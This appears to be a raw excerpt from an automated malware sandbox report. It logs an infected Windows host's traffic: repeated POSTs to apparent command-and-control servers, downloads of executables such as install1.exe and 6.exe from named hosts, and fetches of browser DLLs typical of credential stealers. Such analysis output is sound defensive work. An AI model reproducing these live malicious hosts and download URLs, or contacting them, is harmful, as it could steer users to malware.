                      Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://suliahofuf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hadtpjchr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://horjbqmq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://esvymsmvx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vqxvg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://unjcuxt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xuffstxn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rnopvq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lwdprkm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bnqqs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://imncgs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipbucsran.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bvfkxysv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tomtpsvfw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gwajgepq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hqfldvwwlo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jhxpljskoo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qseyddwdi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ugynawfq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pqaspb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nkqvrbje.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tceeer.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rvjlsh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rxaefwr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://igvekrqlt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://chuxidlayb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vgrvqyptj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/9993_1641737702_2517.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cbqys.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xtjppnbp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wkuthbgxw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://upcunwrd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gaspj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nwxnrl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iwxef.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sygdrk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://npsrffrpxb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eqqeihdtfd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://holwhrfuq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dnaye.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nycnks.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpole.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kfxeicq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wsnlxaykp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rwhbdb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ifihkt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qtvebqyko.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vvqho.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmhfhgftt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /install1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unic11m.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iilwqqrr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: GET /install1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bjhri.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wanghml.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nebtobstfs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ivgwjg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://enxrrgsqu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ofxlqqbqej.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ytdefkxsg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vnrbprjedc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /6.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0620531.xsph.ru
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gjxtjba.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://garlvmrpv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pagwfnjr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeDNS query: name: bit.ly
                      Source: global trafficTCP traffic: 192.168.2.4:49815 -> 185.7.214.171:8080
                      Source: global trafficTCP traffic: 192.168.2.4:49871 -> 86.107.197.138:38133
                      Source: unknownNetwork traffic detected: IP country count 12
                      Source: global trafficTCP traffic: 192.168.2.4:49827 -> 104.47.54.36:25
                      Source: 768F.exe, 0000000D.00000002.868605208.00000000036C1000.00000004.00000001.sdmp, 768F.exe, 0000000D.00000002.869195852.0000000003831000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                      Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: GET /files/9993_1641737702_2517.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                      Source: global trafficHTTP traffic detected: GET //l/f/YmurSn4BZ2GIX1a3-bIa/f1f6008861078c1253fd20374ac2ce7ed5f44d80 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                      Source: global trafficHTTP traffic detected: GET /install1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unic11m.top
                      Source: global trafficHTTP traffic detected: GET /install1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET //l/f/YmurSn4BZ2GIX1a3-bIa/46e4c7a557d7fa442d5850cc1378fc753993ad31 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /6.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0620531.xsph.ru
                      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /htrrfwedsqw.exe HTTP/1.1Host: a0620531.xsph.ruAccept: */*
                      Source: global trafficHTTP traffic detected: GET /c_setup.exe HTTP/1.1Host: a0620531.xsph.ruAccept: */*
                      Source: global trafficHTTP traffic detected: GET /RMR.exe HTTP/1.1Host: a0620531.xsph.ruAccept: */*
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:43:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 19 b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
